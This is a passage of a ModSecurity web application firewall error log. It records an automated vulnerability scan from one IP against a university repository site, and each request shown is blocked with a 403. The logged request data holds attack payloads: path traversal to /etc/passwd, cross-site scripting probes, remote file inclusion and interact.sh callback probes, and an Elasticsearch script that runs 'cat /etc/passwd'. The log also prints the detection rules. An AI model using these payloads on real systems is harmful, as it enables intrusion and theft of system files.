"repositoryfh.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArZPygAAAAC"]
[Tue Aug 29 11:56:40.863242 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAqw534AAAAH"]
[Tue Aug 29 11:56:40.881661 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAocyl4AAAAR"]
[Tue Aug 29 11:56:42.851312 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAArIAXYAAAAX"]
[Tue Aug 29 11:56:43.529501 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAqeFsoAAAAx"]
[Tue Aug 29 11:56:43.715725 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAArZPzwAAAAC"]
[Tue Aug 29 11:56:44.640952 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAAq5@UsAAAAK"]
[Tue Aug 29 11:56:45.575446 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:009964/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAArIAYkAAAAX"]
[Tue Aug 29 11:56:46.766303 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAAq5@VwAAAAK"]
[Tue Aug 29 11:56:46.775162 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:977966/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAArIAZEAAAAX"]
[Tue Aug 29 11:56:47.555575 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAqSw94AAAAN"]
[Tue Aug 29 11:56:47.654665 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAoz8OcAAAAS"]
[Tue Aug 29 11:56:48.591268 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAolK68AAAAe"]
[Tue Aug 29 11:56:48.623598 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAocyowAAAAR"]
[Tue Aug 29 11:56:50.547734 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAolK7oAAAAe"]
[Tue Aug 29 11:56:51.733520 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "repositoryfh.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAArB15sAAAAV"]
[Tue Aug 29 11:56:52.801159 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAArIAbwAAAAX"]
[Tue Aug 29 11:56:52.867325 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAqqtnEAAAAA"]
[Tue Aug 29 11:56:54.640259 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAoz8RYAAAAS"]
[Tue Aug 29 11:56:56.188463 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAq-HjgAAAAT"]
[Tue Aug 29 11:56:57.560777 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAq-Hj4AAAAT"]
[Tue Aug 29 11:56:59.679976 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8VgAAAAS"]
[Tue Aug 29 11:57:01.012220 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAq5@acAAAAK"]
[Tue Aug 29 11:57:01.612470 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAq-HmoAAAAT"]
[Tue Aug 29 11:57:02.579612 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAnEqVkAAAAO"]
[Tue Aug 29 11:57:02.667361 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nsCo-f0AAArB1@cAAAAV"]
[Tue Aug 29 11:57:05.529688 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAArIAe0AAAAX"]
[Tue Aug 29 11:57:07.587350 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAnEqXUAAAAO"]
[Tue Aug 29 11:57:07.760800 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 